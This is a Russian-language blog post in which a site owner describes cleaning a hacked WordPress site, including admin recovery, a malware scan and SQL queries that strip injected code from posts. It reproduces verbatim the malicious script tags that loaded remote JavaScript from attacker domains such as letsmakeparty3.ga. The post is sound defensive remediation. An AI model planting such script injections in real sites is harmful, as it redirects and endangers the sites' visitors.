Массовый взлом сайтов на WordPress, лечим сайт ( letsmakeparty3.ga )
/* Превью
В общем как обычно. На этот раз какой то letsmakeparty3.ga
*/
В кратце, есть сайт на всратом вп, на днях его взломали, навернулась админка, и с сайта идут редиректы, в шапке сайта адреса типа letsmakeparty3.ga
Больше всего меня в этой истории раздосадовало то что антивирус для сайтов AI-Bolit от revisium напроч не хочет работать, и перестал поддерживать винду, хорошо что у меня осталась старая версия, которая работает..
И так, лечим, по порядочку.
- Восстанавливаем админку, для этого в корне в файле `wp-config.php` в самом начале вставляем
define( 'WP_HOME', 'http://новый-адрес-сайта.ru' ); define( 'WP_SITEURL', 'http://новый-адрес-сайта.ru' );
- Тянем файлы на сайта на комп, Качаем старую версию ai-bolit для винды, или новую под линукс с сайтаrevisium, или если ты, %USER_NAME% разберешься, то там и на сайт можно залить, и про сканировать на вирусы, я тупой у меня не получилось.
- Если под винду, то после распаковки архива, закинуть к файлам папку с сайтом, назвать её site, и клацнуть по `start_paranoic.bat`
После сканирования смотреть отчёт в файле `AI-BOLIT-REPORT.html` - Удаляем заражённые файлы, у меня они были преимущественно в папке `wp-content/wflogs`, я грохнул всю папку к херам.
- После чего на всякий случай ещё грохнул папку с кэшем `/wp-content/cache`
- Меняем адрес сайта в базе
Не надо забывать, при любой работе с базой, делать бэк ап,
таблица `wp_options` ячейки `siteurl` и `home` тоже меняем адрес на тот что надо - Теперь нужно чистить таблицу `wp_posts` там в колонке `post_content` практически везде поднасрали таким кодом
Точнее сначала идёт код<script src='https://letsmakeparty3.ga/l.js?n=1' type=text/javascript></script><script src='https://dontstopthismusics.com/song/?type=2' type=text/javascript></script><script src='https://blackentertainments.com/check/?type=2' type=text/javascript></script><script src='https://lobbydesires.com/location.js?n=1' type=text/javascript></script>
Потом контент, потом остатки<script src='https://letsmakeparty3.ga/l.js?n=1' type=text/javascript></script>
Причём были посты тупо содержащий только этот код, по этому сначала избавляюсь от них, mySQL запросом.<script src='https://dontstopthismusics.com/song/?type=2' type=text/javascript></script><script src='https://blackentertainments.com/check/?type=2' type=text/javascript></script><script src='https://lobbydesires.com/location.js?n=1' type=text/javascript></script>
- Чистим посты содержащие только скрипты, у меня их вышло 262 штуки.
DELETE FROM `wp_posts` WHERE `post_content` = "<script src='https://letsmakeparty3.ga/l.js?n=1' type=text/javascript></script><script src='https://dontstopthismusics.com/song/?type=2' type=text/javascript></script><script src='https://blackentertainments.com/check/?type=2' type=text/javascript></script><script src='https://lobbydesires.com/location.js?n=1' type=text/javascript></script>"
- Теперь работа по хитрее, нужно грохать только говноскрипт не задевая контент.
Минус ещё кучу строк говнецаUPDATE `wp_posts` SET `post_content` = REPLACE(post_content, "<script src='https://letsmakeparty3.ga/l.js?n=1' type=text/javascript></script>", "");
- Добиваем остатки
UPDATE `wp_posts` SET `post_content` = REPLACE(post_content, "<script src='https://dontstopthismusics.com/song/?type=2' type=text/javascript></script><script src='https://blackentertainments.com/check/?type=2' type=text/javascript></script><script src='https://lobbydesires.com/location.js?n=1' type=text/javascript></script>", "");
- Осторожненько заходим на сайт. Нужно помнить что некоторые браузеры любят запоминать редиректы, по этому надо сбрасывать кэш, или юзать инкогнито для проверки результата. У меня всё чикибамбони
Важно понимать что этими действиями удаляются последствия заражения, но дыра через которое оно произошло остаётся, я не совсем понял как именно произошло заражения, антивирусом кажеться нашёл бэкдор, но он был старый :D так что если ты, %USER_NAME% знаешь через какую форточку надуло этот говнокод, не стесняйся написать в комменты или на почту (Кажется ветер дул со стороны Китая, судя по IP).
Лучший способ защититься от взломов на WP, перейти с WP на какую нибудь нормальную CMS
Комментарии ()
Написать комментарий